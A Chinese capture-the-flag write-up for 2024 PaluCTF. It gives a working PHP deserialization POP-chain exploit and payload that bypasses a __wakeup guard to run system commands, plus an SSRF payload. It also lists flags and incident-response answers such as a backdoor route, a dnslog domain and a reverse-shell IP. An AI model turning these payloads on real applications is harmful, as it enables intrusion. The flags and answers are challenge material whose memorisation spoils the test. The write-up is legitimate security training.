2024 PaluCTF WP

战队：D0sec      队员：xiaolaisec

又双是一个人孤立无援，由于电脑的原因，应急响应部分的环境一直崩，然后又得重启，(得同时重启8台虚拟机，然后重新登录，每次环境启动又得10多分钟，访问Jumpserver莫名其妙老是给我弹502网关错误，然后就开始摆烂了，啊啊啊啊真的要崩溃了。。。。最后比赛两小时环境又奇迹般的好了一点(比赛快结束了又给我整这四处)，也是匆匆忙忙写了几道应急响应的题。后续有时间会继续复现的（应该是没时间了。。。

当然言归正传，这次比赛还是学到了应急响应的不少东西的。

WEB

R23

经过测试无法绕过wakeup，不过可以通过变量传递改变class b->c的值

但是题目过滤了R:2/R:3 ，大写R可以从左到右与第n个反序列化的变量进行绑定，所以我们不能把$x->c=&$x->b;放在前面，可以多构造几个值，让s:1:"b";N;s:1:"c"往后靠

Exp:

<?php

class a{

    public function __get($a){

        $this->b->love();

    }

}

class b{

    public function __destruct(){

        $tmp = $this->c->name;

    }

    public function __wakeup(){

        $this->c = "no!";

        $this->b = $this->a;

    }

}

class xk{

    public function love(){

       system('ls');

    }

}

$x=new b();

$x->a=new a();

$x->a->b=new xk();

$x->x='a';

$x->c=&$x->b;

echo serialize($x);

Payload:

?pop=O:1:"b":4:{s:1:"a";O:1:"a":1:{s:1:"b";O:2:"xk":0:{}}s:1:"x";s:1:"a";s:1:"b";N;s:1:"c";R:5;}&a=cat flag.php   

F12看源码即可

Web-签到

由于/flag的内容刚好就是paluctf，直接SSRF即可

Payload:?url=http://127.0.0.1/flag

MISC

江

flag{湖北省武汉市江汉二路与江汉路步行街交叉路口}

Misc-签到

转ASCII可知：关注知攻善防和狐狸说安全公众号分别发plbctf即可得到flag的两部分了

flag{TreJaiuLT1rgbdfG0Eay}

应急响应

应急响应-1

题目要求：找到JumpServer堡垒机中flag标签的值。

环境搭好访问地址，查看标签即可

应急响应-3

题目要求：提交攻击者源IP

攻击者IP：192.168.1.4

应急响应-7

题目要求：提交存在反序列化漏洞的端口

可以看到用fscan扫出来的webserver端口号8080返回200，猜测就是漏洞端口

应急响应-8

题目要求：提交攻击者使用的后门路由地址

提交格式：[md5(/api/xxx)]

提交格式给了提示，一开始我以为是 /var/www/html/index.php，因为看回放的是他写入了一句话，但是格式不对，最后在app.py得到了答案，后门路由地址为/api/system

应急响应-9

题目要求：提交dnslog反弹域名。

答案为0vqkht.palu.cn

应急响应-11

题目要求：交攻击者反弹shell使用的语言

答案为python

应急响应-11

题目要求：提交攻击者反弹shell的ip。

答案为 82.157.238.174